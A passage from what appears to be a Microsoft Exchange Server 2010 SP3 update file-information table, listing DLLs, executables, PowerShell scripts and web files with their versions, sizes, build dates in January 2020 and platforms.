05:48| x64 \nMicrosoft.exchange.search.native.dll| 14.3.470.0| 138,440| 03-Jan-2020| 05:48| x64 \nMicrosoft.exchange.security.dll| 14.3.487.0| 192,208| 03-Jan-2020| 05:45| x86 \nMicrosoft.exchange.servicehost.eventlog.dll| 14.3.470.0| 20,400| 03-Jan-2020| 05:45| x64 \nMicrosoft.exchange.servicehost.exe| 14.3.487.0| 35,752| 03-Jan-2020| 05:47| x86 \nMicrosoft.exchange.services.dll| 14.3.487.0| 3,145,424| 03-Jan-2020| 05:46| x86 \nMicrosoft.exchange.services.eventlogs.dll| 14.3.470.0| 32,688| 03-Jan-2020| 05:46| x64 \nMicrosoft.exchange.setup.acquirelanguagepack.dll| 14.3.470.0| 52,872| 03-Jan-2020| 05:47| x86 \nMicrosoft.exchange.setup.common.dll| 14.3.470.0| 454,280| 03-Jan-2020| 05:47| x86 \nMicrosoft.exchange.setup.exsetupuihelper.dll| 14.3.470.0| 216,712| 03-Jan-2020| 05:47| x86 \nMicrosoft.exchange.setup.signverfwrapper.dll| 14.3.470.0| 74,376| 03-Jan-2020| 05:47| x64 \nMicrosoft.exchange.sqm.dll| 14.3.470.0| 65,224| 03-Jan-2020| 05:46| x86 \nMicrosoft.exchange.storedriver.dll| 14.3.487.0| 556,752| 03-Jan-2020| 05:46| x86 \nMicrosoft.exchange.storedriver.eventlog.dll| 14.3.470.0| 23,472| 03-Jan-2020| 05:46| x64 \nMicrosoft.exchange.storeprovider.dll| 14.3.470.0| 859,784| 03-Jan-2020| 05:46| x86 \nMicrosoft.exchange.structuredquery.dll| 14.3.470.0| 159,944| 03-Jan-2020| 05:48| x64 \nMicrosoft.exchange.transport.agent.antispam.common.dll| 14.3.470.0| 77,448| 03-Jan-2020| 05:46| x86 \nMicrosoft.exchange.transport.agent.contentfilter.cominterop.dll| 14.3.470.0| 29,320| 03-Jan-2020| 05:48| x86 \nMicrosoft.exchange.transport.agent.headerconversion.dll| 14.3.470.0| 26,248| 03-Jan-2020| 05:46| x86 \nMicrosoft.exchange.transport.agent.hygiene.dll| 14.3.470.0| 233,096| 03-Jan-2020| 05:46| x86 \nMicrosoft.exchange.transport.agent.liveidauth.dll| 14.3.470.0| 23,680| 03-Jan-2020| 05:46| x86 \nMicrosoft.exchange.transport.agent.prioritization.dll| 14.3.470.0| 44,680| 03-Jan-2020| 05:46| x86 \nMicrosoft.exchange.transport.agent.protocolanalysis.dbaccess.dll| 14.3.470.0| 65,160| 03-Jan-2020| 05:46| x86 \nMicrosoft.exchange.transport.agent.senderid.core.dll| 14.3.470.0| 73,352| 03-Jan-2020| 05:48| x86 \nMicrosoft.exchange.transport.agent.trustedmailagents.dll| 14.3.487.0| 57,040| 03-Jan-2020| 05:46| x86 \nMicrosoft.exchange.transport.dll| 14.3.487.0| 1,916,624| 03-Jan-2020| 05:46| x86 \nMicrosoft.exchange.transport.eventlog.dll| 14.3.470.0| 104,368| 03-Jan-2020| 05:46| x64 \nMicrosoft.exchange.transport.logging.search.dll| 14.3.470.0| 102,024| 03-Jan-2020| 05:48| x86 \nMicrosoft.exchange.transport.sync.common.dll| 14.3.487.0| 442,064| 03-Jan-2020| 05:46| x86 \nMicrosoft.exchange.transport.sync.common.eventlog.dll| 14.3.470.0| 18,888| 03-Jan-2020| 05:46| x64 \nMicrosoft.exchange.transport.sync.worker.dll| 14.3.487.0| 1,072,848| 03-Jan-2020| 05:46| x86 \nMicrosoft.exchange.transport.sync.worker.eventlog.dll| 14.3.470.0| 21,936| 03-Jan-2020| 05:46| x64 \nMicrosoft.exchange.transportlogsearch.eventlog.dll| 14.3.470.0| 27,568| 03-Jan-2020| 05:48| x64 \nMicrosoft.exchange.um.clientstrings.dll| 14.3.470.0| 77,448| 03-Jan-2020| 05:48| x86 \nMicrosoft.exchange.um.lad.dll| 14.3.470.0| 123,528| 03-Jan-2020| 05:48| x64 \nMicrosoft.exchange.um.prompts.dll| 14.3.470.0| 212,616| 03-Jan-2020| 05:46| x86 \nMicrosoft.exchange.um.troubleshootingtool.shared.dll| 14.3.470.0| 102,024| 03-Jan-2020| 05:46| x86 \nMicrosoft.exchange.um.ucmaplatform.dll| 14.3.487.0| 188,112| 03-Jan-2020| 05:48| x86 \nMicrosoft.exchange.um.umcommon.dll| 14.3.487.0| 765,856| 03-Jan-2020| 05:48| x86 \nMicrosoft.exchange.um.umcore.dll| 14.3.487.0| 1,384,144| 03-Jan-2020| 05:48| x86 \nMicrosoft.exchange.unifiedmessaging.eventlog.dll| 14.3.470.0| 108,976| 03-Jan-2020| 05:46| x64 \nMicrosoft.managementgui.dll| 14.3.470.0| 155,336| 03-Jan-2020| 05:45| x86 \nMicrosoft.powershell.hostingtools.dll| 14.3.470.0| 89,800| 03-Jan-2020| 05:48| x86 \nMicrosoft.powershell.hostingtools_2.dll| 14.3.470.0| 89,800| 03-Jan-2020| 05:45| x86 \nMigbase.dll| 14.3.470.0| 783,792| 03-Jan-2020| 05:48| x64 \nMigmsg.dll| 14.3.470.0| 91,560| 03-Jan-2020| 05:46| x64 \nMigrateumcustomprompts.ps1| Not applicable| 16,986| 03-Jan-2020| 05:47| Not applicable \nMoveallreplicas.ps1| Not applicable| 13,043| 03-Jan-2020| 05:47| Not applicable \nMovemailbox.ps1| Not applicable| 56,868| 03-Jan-2020| 05:47| Not applicable \nMovetransportdatabase.ps1| Not applicable| 28,466| 03-Jan-2020| 05:47| Not applicable \nMsallog.dll| 14.3.470.0| 46,504| 03-Jan-2020| 05:46| x64 \nMsexchangeadtopologyservice.exe| 14.3.470.0| 114,096| 03-Jan-2020| 05:50| x64 \nMsexchangefds.exe| 14.3.470.0| 110,280| 03-Jan-2020| 05:46| x86 \nMsexchangelesearchworker.exe| 14.3.487.0| 89,808| 03-Jan-2020| 05:47| x86 \nMsexchangemailboxassistants.exe| 14.3.487.0| 802,512| 03-Jan-2020| 05:46| x86 \nMsexchangemailboxreplication.exe| 14.3.470.0| 27,272| 03-Jan-2020| 05:46| x86 \nMsexchangemailsubmission.exe| 14.3.487.0| 118,480| 03-Jan-2020| 05:46| x86 \nMsexchangerepl.exe| 14.3.487.0| 69,328| 03-Jan-2020| 05:46| x86 \nMsexchangethrottling.exe| 14.3.470.0| 48,840| 03-Jan-2020| 05:46| x86 \nMsexchangetransport.exe| 14.3.470.0| 81,544| 03-Jan-2020| 05:46| x86 \nMsexchangetransportlogsearch.exe| 14.3.487.0| 212,688| 03-Jan-2020| 05:48| x86 \nMsfte1.dll| 14.0.7177.5001| 3,228,440| 03-Jan-2020| 05:48| x64 \nMsgedt.js| Not applicable| 4,778| 03-Jan-2020| 05:46| Not applicable \nMsglst.js| Not applicable| 3,295| 03-Jan-2020| 05:46| Not applicable \nNewtestcasconnectivityuser.ps1| Not applicable| 20,120| 03-Jan-2020| 05:47| Not applicable \nNewtestcasconnectivityuserhosting.ps1| Not applicable| 22,443| 03-Jan-2020| 05:47| Not applicable \nNtspxgen.dll| 14.3.470.0| 87,472| 03-Jan-2020| 05:45| x64 \nOabgen.dll| 14.3.470.0| 356,784| 03-Jan-2020| 05:48| x64 \nOcemul.dll| 8.5.3.76| 54,112| 03-Jan-2020| 05:49| x64 \nOilink.dll| 8.5.3.76| 464,736| 03-Jan-2020| 05:49| x86 \nOilink.exe| 8.5.3.76| 317,280| 03-Jan-2020| 05:49| x64 \nOilink.jar| Not applicable| 1,425,202| 03-Jan-2020| 05:49| Not applicable \nOitnsf.id| Not applicable| 4,688| 03-Jan-2020| 05:49| Not applicable \nOit_font_metrics.db| Not applicable| 375,808| 03-Jan-2020| 05:49| Not applicable \nOleconverter.exe| 14.3.470.0| 162,736| 03-Jan-2020| 05:46| x64 \nOswin64.dll| 8.5.3.76| 103,272| 03-Jan-2020| 05:49| x64 \nOutsidein.dll| 8.5.3.76| 296,296| 03-Jan-2020| 05:49| x86 \nOwaauth.dll| 14.3.470.0| 104,880| 03-Jan-2020| 05:46| x64 \nOwasl.xap| Not applicable| 36,280| 03-Jan-2020| 05:46| Not applicable \nOwasmime.msi| Not applicable| 2,297,856| 03-Jan-2020| 05:45| Not applicable \nOwaspell.dll| 14.3.470.0| 50,608| 03-Jan-2020| 05:49| x64 \nPerfnm.h| Not applicable| 47,627| 03-Jan-2020| 05:50| Not applicable \nPerf_common_extrace.dll| 14.3.470.0| 170,416| 03-Jan-2020| 05:48| x64 \nPerf_exchmem.dll| 14.3.470.0| 71,600| 03-Jan-2020| 05:48| x64 \nPerf_mdbsz.dll| 14.3.470.0| 56,752| 03-Jan-2020| 05:50| x64 \nPolicytest.exe| 14.3.470.0| 51,632| 03-Jan-2020| 05:48| x64 \nPremium.css| Not applicable| 202,304| 03-Jan-2020| 05:47| Not applicable \nPreparemoverequesthosting.ps1| Not applicable| 68,859| 03-Jan-2020| 05:47| Not applicable \nPrepare_moverequest.ps1| Not applicable| 69,054| 03-Jan-2020| 05:47| Not applicable \nPublishedstartpage.js| Not applicable| 15,353| 03-Jan-2020| 05:46| Not applicable \nQuietexe.exe| 14.3.470.0| 21,640| 03-Jan-2020| 05:47| x86 \nReadpost.aspx| Not applicable| 6,516| 03-Jan-2020| 05:49| Not applicable \nReadsharingmessage.ascx| Not applicable| 5,235| 03-Jan-2020| 05:49| Not applicable \nReadvoicemailmessage.aspx| Not applicable| 9,320| 03-Jan-2020| 05:49| Not applicable \nRedir.aspx| Not applicable| 1,714| 03-Jan-2020| 05:49| Not applicable \nRedistributeactivedatabases.ps1| Not applicable| 114,387| 03-Jan-2020| 05:47| Not applicable \nReenable_auditloggingagent.ps1| Not applicable| 12,395| 03-Jan-2020| 05:47| Not applicable \nReinstalldefaulttransportagents.ps1| Not applicable| 20,402| 03-Jan-2020| 05:47| Not applicable \nRemoteexchange.ps1| Not applicable| 19,447| 03-Jan-2020| 05:47| Not applicable \nRemovereplicafrompfrecursive.ps1| Not applicable| 13,887| 03-Jan-2020| 05:47| Not applicable \nRemoveuserfrompfrecursive.ps1| Not applicable| 13,191| 03-Jan-2020| 05:47| Not applicable \nReplacereplicaonpfrecursive.ps1| Not applicable| 14,292| 03-Jan-2020| 05:47| Not applicable \nReplaceuserpermissiononpfrecursive.ps1| Not applicable| 13,551| 03-Jan-2020| 05:47| Not applicable \nReplaceuserwithuseronpfrecursive.ps1| Not applicable| 13,547| 03-Jan-2020| 05:47| Not applicable \nReplaycrimsonevents.man| Not applicable| 247,121| 03-Jan-2020| 05:48| Not applicable \nReplaycrimsonmsg.dll| 14.3.470.0| 266,440| 03-Jan-2020| 05:48| x64 \nResetattachmentfilterentry.ps1| Not applicable| 13,332| 03-Jan-2020| 05:47| Not applicable \nResetcasservice.ps1| Not applicable| 19,563| 03-Jan-2020| 05:47| Not applicable \nResetsearchindex.ps1| Not applicable| 14,653| 03-Jan-2020| 05:47| Not applicable \nReset_antispamupdates.ps1| Not applicable| 12,017| 03-Jan-2020| 05:48| Not applicable \nResumemailboxdatabasecopy.ps1| Not applicable| 15,126| 03-Jan-2020| 05:47| Not applicable \nRightsmanagementwrapper.dll| 14.3.470.0| 86,440| 03-Jan-2020| 05:48| x64 \nRollalternateserviceaccountpassword.ps1| Not applicable| 53,296| 03-Jan-2020| 05:47| Not applicable \nRoutingview.exe| 14.3.470.0| 167,560| 03-Jan-2020| 05:48| x86 \nRulesauditmsg.dll| 14.3.470.0| 18,864| 03-Jan-2020| 05:48| x64 \nSccanno.dll| 8.5.3.76| 136,552| 03-Jan-2020| 05:49| x64 \nSccca.dll| 8.5.3.76| 46,944| 03-Jan-2020| 05:49| x64 \nSccch.dll| 8.5.3.76| 201,056| 03-Jan-2020| 05:49| x64 \nSccda.dll| 8.5.3.76| 151,904| 03-Jan-2020| 05:49| x64 \nSccdu.dll| 8.5.3.76| 617,824| 03-Jan-2020| 05:49| x64 \nSccex.dll| 8.5.3.76| 94,560| 03-Jan-2020| 05:49| x64 \nSccfa.dll| 8.5.3.76| 86,880| 03-Jan-2020| 05:49| x64 \nSccfi.dll| 8.5.3.76| 143,712| 03-Jan-2020| 05:49| x64 \nSccfmt.dll| 8.5.3.76| 75,616| 03-Jan-2020| 05:49| x64 \nSccfnt.dll| 8.5.3.76| 504,160| 03-Jan-2020| 05:49| x64 \nSccfut.dll| 8.5.3.76| 862,560| 03-Jan-2020| 05:49| x64 \nSccimg.dll| 8.5.3.76| 426,848| 03-Jan-2020| 05:49| x64 \nSccind.dll| 8.5.3.76| 68,960| 03-Jan-2020| 05:49| x64 \nScclo.dll| 8.5.3.76| 162,656| 03-Jan-2020| 05:49| x64 \nSccole2.dll| 8.5.3.76| 30,568| 03-Jan-2020| 05:49| x64 \nSccsd.dll| 8.5.3.76| 43,360| 03-Jan-2020| 05:49| x64 \nSccut.dll| 8.5.3.76| 2,001,248| 03-Jan-2020| 05:49| x64 \nSccxt.dll| 8.5.3.76| 54,624| 03-Jan-2020| 05:49| x64 \nServicecontrol.ps1| Not applicable| 45,721| 03-Jan-2020| 05:47| Not applicable \nSetup.com| 14.3.470.0| 444,928| 03-Jan-2020| 05:47| Not applicable \nSetup.exe| 14.3.470.0| 603,568| 03-Jan-2020| 05:47| x64 \nSmimeoptions.aspx| Not applicable| 10,805| 03-Jan-2020| 05:49| Not applicable \nSmimeparameterstandalone.js| Not applicable| 10,566| 03-Jan-2020| 05:47| Not applicable \nSmtpreceiveperfcounters.h| Not applicable| 1,014| 03-Jan-2020| 05:46| Not applicable \nSmtpreceiveperfcounters.ini| Not applicable| 11,910| 03-Jan-2020| 05:50| Not applicable \nSmtpreceiveperfcounters.xml| Not applicable| 3,439| 03-Jan-2020| 05:50| Not applicable \nSmtpsendperfcounters.h| Not applicable| 739| 03-Jan-2020| 05:50| Not applicable \nSmtpsendperfcounters.ini| Not applicable| 8,488| 03-Jan-2020| 05:50| Not applicable \nSmtpsendperfcounters.xml| Not applicable| 2,527| 03-Jan-2020| 05:50| Not applicable \nStartdagservermaintenance.ps1| Not applicable| 22,566| 03-Jan-2020| 05:47| Not applicable \nStartpage.aspx| Not applicable| 10,891| 03-Jan-2020| 05:49| Not applicable \nStartpage.js| Not applicable| 177,388| 03-Jan-2020| 05:46| Not applicable \nStopdagservermaintenance.ps1| Not applicable| 15,837| 03-Jan-2020| 05:47| Not applicable \nStore.exe| 14.3.470.0| 6,941,640| 03-Jan-2020| 05:48| x64 \nStoretsconstants.ps1| Not applicable| 15,592| 03-Jan-2020| 05:49| Not applicable \nStoretslibrary.ps1| Not applicable| 25,360| 03-Jan-2020| 05:49| Not applicable \nStore_mapi_net_bin_perf_x64_exrpcperf.dll| 14.3.470.0| 37,296| 03-Jan-2020| 05:46| x64 \nTokenm.dll| 14.3.470.0| 66,984| 03-Jan-2020| 05:46| x64 \nTranscodingservice.exe| 14.3.470.0| 130,992| 03-Jan-2020| 05:46| x64 \nTroubleshoot_ci.ps1| Not applicable| 24,393| 03-Jan-2020| 05:49| Not applicable \nTroubleshoot_databaselatency.ps1| Not applicable| 23,679| 03-Jan-2020| 05:49| Not applicable \nTroubleshoot_databasespace.ps1| Not applicable| 29,030| 03-Jan-2020| 05:49| Not applicable \nUglobal.js| Not applicable| 984,109| 03-Jan-2020| 05:46| Not applicable \nUmservice.exe| 14.3.470.0| 147,080| 03-Jan-2020| 05:46| x86 \nUmworkerprocess.exe| 14.3.470.0| 56,968| 03-Jan-2020| 05:48| x86 \nUninstall_antispamagents.ps1| Not applicable| 12,489| 03-Jan-2020| 05:48| Not applicable \nUpdatecas.ps1| Not applicable| 16,662| 03-Jan-2020| 05:47| Not applicable \nUpdateconfigfiles.ps1| Not applicable| 24,906| 03-Jan-2020| 05:47| Not applicable \nUview.js| Not applicable| 178,233| 03-Jan-2020| 05:46| Not applicable \nVlv.js| Not applicable| 140,614| 03-Jan-2020| 05:46| Not applicable \nVsacad.dll| 8.5.3.76| 14,228,832| 03-Jan-2020| 05:49| x64 \nVsacs.dll| 8.5.3.76| 41,824| 03-Jan-2020| 05:49| x64 \nVsami.dll| 8.5.3.76| 74,592| 03-Jan-2020| 05:49| x64 \nVsarc.dll| 8.5.3.76| 24,928| 03-Jan-2020| 05:49| x64 \nVsasf.dll| 8.5.3.76| 34,144| 03-Jan-2020| 05:49| x64 \nVsbdr.dll| 8.5.3.76| 27,488| 03-Jan-2020| 05:49| x64 \nVsbmp.dll| 8.5.3.76| 35,168| 03-Jan-2020| 05:49| x64 \nVscdrx.dll| 8.5.3.76| 22,880| 03-Jan-2020| 05:49| x64 \nVscgm.dll| 8.5.3.76| 53,600| 03-Jan-2020| 05:49| x64 \nVsdbs.dll| 8.5.3.76| 26,464| 03-Jan-2020| 05:49| x64 \nVsdez.dll| 8.5.3.76| 31,072| 03-Jan-2020| 05:49| x64 \nVsdif.dll| 8.5.3.76| 25,952| 03-Jan-2020| 05:49| x64 \nVsdrw.dll| 8.5.3.76| 36,192| 03-Jan-2020| 05:49| x64 \nVsdx.dll| 8.5.3.76| 30,560| 03-Jan-2020| 05:49| x64 \nVsdxla.dll| 8.5.3.76| 32,096| 03-Jan-2020| 05:49| x64 \nVsdxlm.dll| 8.5.3.76| 80,224| 03-Jan-2020| 05:49| x64 \nVsemf.dll| 8.5.3.76| 64,864| 03-Jan-2020| 05:49| x64 \nVsen4.dll| 8.5.3.76| 32,096| 03-Jan-2020| 05:49| x64 \nVsens.dll| 8.5.3.76| 29,536| 03-Jan-2020| 05:49| x64 \nVsenw.dll| 8.5.3.76| 29,024| 03-Jan-2020| 05:49| x64 \nVseps.dll| 8.5.3.76| 23,904| 03-Jan-2020| 05:49| x64 \nVseshr.dll| 8.5.3.76| 188,768| 03-Jan-2020| 05:49| x64 \nVsexe2.dll| 8.5.3.76| 53,088| 03-Jan-2020| 05:49| x64 \nVsfax.dll| 8.5.3.76| 26,464| 03-Jan-2020| 05:49| x64 \nVsfcd.dll| 8.5.3.76| 27,488| 03-Jan-2020| 05:49| x64 \nVsfcs.dll| 8.5.3.76| 31,072| 03-Jan-2020| 05:49| x64 \nVsfft.dll| 8.5.3.76| 29,536| 03-Jan-2020| 05:49| x64 \nVsflw.dll| 8.5.3.76| 154,464| 03-Jan-2020| 05:49| x64 \nVsfwk.dll| 8.5.3.76| 45,920| 03-Jan-2020| 05:49| x64 \nVsgdsf.dll| 8.5.3.76| 89,440| 03-Jan-2020| 05:49| x64 \nVsgif.dll| 8.5.3.76| 31,584| 03-Jan-2020| 05:49| x64 \nVsgzip.dll| 8.5.3.76| 37,216| 03-Jan-2020| 05:49| x64 \nVshgs.dll| 8.5.3.76| 50,016| 03-Jan-2020| 05:49| x64 \nVshtml.dll| 8.5.3.76| 517,984| 03-Jan-2020| 05:49| x64 \nVshwp.dll| 8.5.3.76| 91,488| 03-Jan-2020| 05:49| x64 \nVshwp2.dll| 8.5.3.76| 111,968| 03-Jan-2020| 05:49| x64 \nVsich.dll| 8.5.3.76| 136,032| 03-Jan-2020| 05:49| x64 \nVsich6.dll| 8.5.3.76| 62,816| 03-Jan-2020| 05:49| x64 \nVsid3.dll| 8.5.3.76| 53,088| 03-Jan-2020| 05:49| x64 \nVsimg.dll| 8.5.3.76| 24,928| 03-Jan-2020| 05:49| x64 \nVsindd.dll| 8.5.3.76| 23,904| 03-Jan-2020| 05:49| x64 \nVsinx.dll| 8.5.3.76| 21,344| 03-Jan-2020| 05:49| x64 \nVsiwok.dll| 8.5.3.76| 36,704| 03-Jan-2020| 05:49| x64 \nVsiwok13.dll| 8.5.3.76| 1,409,384| 03-Jan-2020| 05:49| x64 \nVsiwon.dll| 8.5.3.76| 70,496| 03-Jan-2020| 05:49| x64 \nVsiwop.dll| 8.5.3.76| 40,288| 03-Jan-2020| 05:49| x64 \nVsiwp.dll| 8.5.3.76| 29,536| 03-Jan-2020| 05:49| x64 \nVsjbg2.dll| 8.5.3.76| 31,584| 03-Jan-2020| 05:49| x64 \nVsjp2.dll| 8.5.3.76| 249,184| 03-Jan-2020| 05:49| x64 \nVsjw.dll| 8.5.3.76| 35,168| 03-Jan-2020| 05:49| x64 \nVsleg.dll| 8.5.3.76| 41,312| 03-Jan-2020| 05:49| x64 \nVslwp7.dll| 8.5.3.76| 360,288| 03-Jan-2020| 05:49| x64 \nVslzh.dll| 8.5.3.76| 41,824| 03-Jan-2020| 05:49| x64 \nVsm11.dll| 8.5.3.76| 28,512| 03-Jan-2020| 05:49| x64 \nVsmanu.dll| 8.5.3.76| 40,288| 03-Jan-2020| 05:49| x64 \nVsmbox.dll| 8.5.3.76| 40,288| 03-Jan-2020| 05:49| x64 \nVsmcw.dll| 8.5.3.76| 44,384| 03-Jan-2020| 05:49| x64 \nVsmdb.dll| 8.5.3.76| 45,920| 03-Jan-2020| 05:49| x64 \nVsmif.dll| 8.5.3.76| 217,952| 03-Jan-2020| 05:49| x64 \nVsmime.dll| 8.5.3.76| 135,008| 03-Jan-2020| 05:49| x64 \nVsmm.dll| 8.5.3.76| 34,144| 03-Jan-2020| 05:49| x64 \nVsmm4.dll| 8.5.3.76| 36,192| 03-Jan-2020| 05:49| x64 \nVsmmfn.dll| 8.5.3.76| 31,072| 03-Jan-2020| 05:49| x64 \nVsmp.dll| 8.5.3.76| 29,536| 03-Jan-2020| 05:49| x64 \nVsmpp.dll| 8.5.3.76| 249,696| 03-Jan-2020| 05:49| x64 \nVsmsg.dll| 8.5.3.76| 96,096| 03-Jan-2020| 05:49| x64 \nVsmsw.dll| 8.5.3.76| 46,432| 03-Jan-2020| 05:49| x64 \nVsmwkd.dll| 8.5.3.76| 26,464| 03-Jan-2020| 05:49| x64 \nVsmwks.dll| 8.5.3.76| 25,440| 03-Jan-2020| 05:49| x64 \nVsmwp2.dll| 8.5.3.76| 49,504| 03-Jan-2020| 05:49| x64 \nVsmwpf.dll| 8.5.3.76| 34,656| 03-Jan-2020| 05:49| x64 \nVsmwrk.dll| 8.5.3.76| 27,488| 03-Jan-2020| 05:49| x64 \nVsnsf.dll| 8.5.3.76| 38,240| 03-Jan-2020| 05:49| x64 \nVsolm.dll| 8.5.3.76| 153,952| 03-Jan-2020| 05:49| x64 \nVsone.dll| 8.5.3.76| 81,760| 03-Jan-2020| 05:49| x64 \nVsow.dll| 8.5.3.76| 24,928| 03-Jan-2020| 05:49| x64 \nVspbm.dll| 8.5.3.76| 24,928| 03-Jan-2020| 05:49| x64 \nVspcl.dll| 8.5.3.76| 23,392| 03-Jan-2020| 05:49| x64 \nVspcx.dll| 8.5.3.76| 29,024| 03-Jan-2020| 05:49| x64 \nVspdf.dll| 8.5.3.76| 260,448| 03-Jan-2020| 05:49| x64 \nVspdfi.dll| 8.5.3.76| 278,368| 03-Jan-2020| 05:49| x64 \nVspdx.dll| 8.5.3.76| 31,584| 03-Jan-2020| 05:49| x64 \nVspfs.dll| 8.5.3.76| 41,312| 03-Jan-2020| 05:49| x64 \nVspgl.dll| 8.5.3.76| 59,744| 03-Jan-2020| 05:49| x64 \nVspic.dll| 8.5.3.76| 25,440| 03-Jan-2020| 05:49| x64 \nVspict.dll| 8.5.3.76| 55,136| 03-Jan-2020| 05:49| x64 \nVspng.dll| 8.5.3.76| 53,600| 03-Jan-2020| 05:49| x64 \nVspntg.dll| 8.5.3.76| 22,880| 03-Jan-2020| 05:49| x64 \nVspp12.dll| 8.5.3.76| 131,936| 03-Jan-2020| 05:49| x64 \nVspp2.dll| 8.5.3.76| 72,032| 03-Jan-2020| 05:49| x64 \nVspp7.dll| 8.5.3.76| 77,664| 03-Jan-2020| 05:49| x64 \nVspp97.dll| 8.5.3.76| 227,680| 03-Jan-2020| 05:49| x64 \nVsppl.dll| 8.5.3.76| 39,264| 03-Jan-2020| 05:49| x64 \nVspsd.dll| 8.5.3.76| 23,904| 03-Jan-2020| 05:49| x64 \nVspsp6.dll| 8.5.3.76| 189,792| 03-Jan-2020| 05:49| x64 \nVspst.dll| 8.5.3.76| 82,272| 03-Jan-2020| 05:49| x64 \nVspstf.dll| 8.5.3.76| 35,168| 03-Jan-2020| 05:49| x64 \nVsqa.dll| 8.5.3.76| 29,536| 03-Jan-2020| 05:49| x64 \nVsqad.dll| 8.5.3.76| 35,168| 03-Jan-2020| 05:49| x64 \nVsqp6.dll| 8.5.3.76| 53,600| 03-Jan-2020| 05:49| x64 \nVsqp9.dll| 8.5.3.76| 76,128| 03-Jan-2020| 05:49| x64 \nVsqt.dll| 8.5.3.76| 35,168| 03-Jan-2020| 05:49| x64 \nVsrar.dll| 8.5.3.76| 141,152| 03-Jan-2020| 05:49| x64 \nVsras.dll| 8.5.3.76| 24,416| 03-Jan-2020| 05:49| x64 \nVsrbs.dll| 8.5.3.76| 35,168| 03-Jan-2020| 05:49| x64 \nVsrft.dll| 8.5.3.76| 36,192| 03-Jan-2020| 05:49| x64 \nVsrfx.dll| 8.5.3.76| 31,584| 03-Jan-2020| 05:49| x64 \nVsriff.dll| 8.5.3.76| 28,000| 03-Jan-2020| 05:49| x64 \nVsrtf.dll| 8.5.3.76| 171,872| 03-Jan-2020| 05:49| x64 \nVssam.dll| 8.5.3.76| 29,024| 03-Jan-2020| 05:49| x64 \nVssc5.dll| 8.5.3.76| 32,608| 03-Jan-2020| 05:49| x64 \nVssdw.dll| 8.5.3.76| 29,536| 03-Jan-2020| 05:49| x64 \nVsshw3.dll| 8.5.3.76| 40,288| 03-Jan-2020| 05:49| x64 \nVssmd.dll| 8.5.3.76| 27,488| 03-Jan-2020| 05:49| x64 \nVssms.dll| 8.5.3.76| 28,000| 03-Jan-2020| 05:49| x64 \nVssmt.dll| 8.5.3.76| 33,632| 03-Jan-2020| 05:49| x64 \nVssnap.dll| 8.5.3.76| 31,072| 03-Jan-2020| 05:49| x64 \nVsso6.dll| 8.5.3.76| 306,016| 03-Jan-2020| 05:49| x64 \nVssoc.dll| 8.5.3.76| 43,360| 03-Jan-2020| 05:49| x64 \nVssoc6.dll| 8.5.3.76| 285,536| 03-Jan-2020| 05:49| x64 \nVssoi.dll| 8.5.3.76| 40,800| 03-Jan-2020| 05:49| x64 \nVssoi6.dll| 8.5.3.76| 304,992| 03-Jan-2020| 05:50| x64 \nVssow.dll| 8.5.3.76| 34,144| 03-Jan-2020| 05:50| x64 \nVsspt.dll| 8.5.3.76| 28,000| 03-Jan-2020| 05:50| x64 \nVsssml.dll| 8.5.3.76| 29,024| 03-Jan-2020| 05:50| x64 \nVsswf.dll| 8.5.3.76| 34,144| 03-Jan-2020| 05:50| x64 \nVstaz.dll| 8.5.3.76| 36,192| 03-Jan-2020| 05:50| x64 \nVstext.dll| 8.5.3.76| 35,168| 03-Jan-2020| 05:50| x64 \nVstga.dll| 8.5.3.76| 26,976| 03-Jan-2020| 05:50| x64 \nVstif6.dll| 8.5.3.76| 103,776| 03-Jan-2020| 05:50| x64 \nVstw.dll| 8.5.3.76| 34,144| 03-Jan-2020| 05:50| x64 \nVstxt.dll| 8.5.3.76| 38,752| 03-Jan-2020| 05:50| x64 \nVsvcrd.dll| 8.5.3.76| 82,272| 03-Jan-2020| 05:50| x64 \nVsviso.dll| 8.5.3.76| 205,664| 03-Jan-2020| 05:50| x64 \nVsvsdx.dll| 8.5.3.76| 47,456| 03-Jan-2020| 05:50| x64 \nVsvw3.dll| 8.5.3.76| 29,024| 03-Jan-2020| 05:50| x64 \nVsw12.dll| 8.5.3.76| 221,536| 03-Jan-2020| 05:50| x64 \nVsw6.dll| 8.5.3.76| 138,080| 03-Jan-2020| 05:50| x64 \nVsw97.dll| 8.5.3.76| 236,896| 03-Jan-2020| 05:50| x64 \nVswbmp.dll| 8.5.3.76| 22,368| 03-Jan-2020| 05:50| x64 \nVswg2.dll| 8.5.3.76| 47,968| 03-Jan-2020| 05:50| x64 \nVswk4.dll| 8.5.3.76| 103,264| 03-Jan-2020| 05:50| x64 \nVswk6.dll| 8.5.3.76| 154,464| 03-Jan-2020| 05:50| x64 \nVswks.dll| 8.5.3.76| 48,480| 03-Jan-2020| 05:50| x64 \nVswm.dll| 8.5.3.76| 30,048| 03-Jan-2020| 05:50| x64 \nVswmf.dll| 8.5.3.76| 45,920| 03-Jan-2020| 05:50| x64 \nVswml.dll| 8.5.3.76| 68,960| 03-Jan-2020| 05:50| x64 \nVsword.dll| 8.5.3.76| 86,880| 03-Jan-2020| 05:50| x64 \nVswork.dll| 8.5.3.76| 36,192| 03-Jan-2020| 05:50| x64 \nVswp5.dll| 8.5.3.76| 75,616| 03-Jan-2020| 05:50| x64 \nVswp6.dll| 8.5.3.76| 107,360| 03-Jan-2020| 05:50| x64 \nVswpf.dll| 8.5.3.76| 30,560| 03-Jan-2020| 05:50| x64 \nVswpg.dll| 8.5.3.76| 48,480| 03-Jan-2020| 05:50| x64 \nVswpg2.dll| 8.5.3.76| 57,184| 03-Jan-2020| 05:50| x64 \nVswpl.dll| 8.5.3.76| 39,264| 03-Jan-2020| 05:50| x64 \nVswpml.dll| 8.5.3.76| 29,024| 03-Jan-2020| 05:50| x64 \nVswpw.dll| 8.5.3.76| 68,448| 03-Jan-2020| 05:50| x64 \nVsws.dll| 8.5.3.76| 37,728| 03-Jan-2020| 05:50| x64 \nVsws2.dll| 8.5.3.76| 29,024| 03-Jan-2020| 05:50| x64 \nVsxl12.dll| 8.5.3.76| 261,472| 03-Jan-2020| 05:50| x64 \nVsxl5.dll| 8.5.3.76| 289,632| 03-Jan-2020| 05:50| x64 \nVsxlsb.dll| 8.5.3.76| 244,064| 03-Jan-2020| 05:50| x64 \nVsxml.dll| 8.5.3.76| 31,584| 03-Jan-2020| 05:50| x64 \nVsxmp.dll| 8.5.3.76| 22,368| 03-Jan-2020| 05:50| x64 \nVsxps.dll| 8.5.3.76| 51,552| 03-Jan-2020| 05:50| x64 \nVsxy.dll| 8.5.3.76| 35,680| 03-Jan-2020| 05:50| x64 \nVsyim.dll| 8.5.3.76| 30,560| 